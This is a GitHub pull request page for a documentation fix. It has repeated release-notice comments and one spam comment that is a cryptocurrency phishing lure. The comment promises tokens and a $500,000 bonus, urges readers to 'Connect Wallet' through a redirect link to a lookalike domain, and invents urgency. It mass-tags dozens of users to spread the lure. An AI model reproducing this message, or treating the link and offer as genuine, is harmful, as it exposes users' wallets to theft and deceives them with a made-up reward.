### PR TITLE
fix: Doc

### PR DESCRIPTION
**Pull request by jinugasachio**

### CODE REVIEW

**Comment by jinugasachio** [comment]
This PR is included in version 1.0.1 :tada:

**Comment by jinugasachio** [comment]
This PR is included in version 1.0.1 :tada:

**Comment by jinugasachio** [comment]
This PR is included in version 1.0.1 :tada:

**Comment by hfzi** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
orenyomtov, @chy373, @argan, @YoshihitoAso, @bt3gl, @artaime, @ablegao, @ray-themedium, @chenghao, @UdonDa, @chachra, @jmahhh, @bliutech, @Ay-355, @vfishv, @IOC0ntr0l, @jerry117, @tucq88, @jcarlos78, @rwbaumg, @jmcph4, @uforgetmenot, @Ghostsarah0042, @brijeshdubey8779, @aksl337, @elsampsa, @kepeto, @AndrewLaganaro, @CodeGp2018, @giovannimorlin, @ivlevdenis, @massnomis, @duml, @Indeoo, @BladeRunner713, @DtorrX, @Maxwell-Hu, @DanteAlabastro, @jaimebw, @onysd128, @yix081, @linusfm, @zzd1990421, @fcfangcc, @MichaelHettmer, @kshah115, @xlansmasry, @ucarz, @Adwaith-Rajesh, @Sukanthan

**Pull request merged**
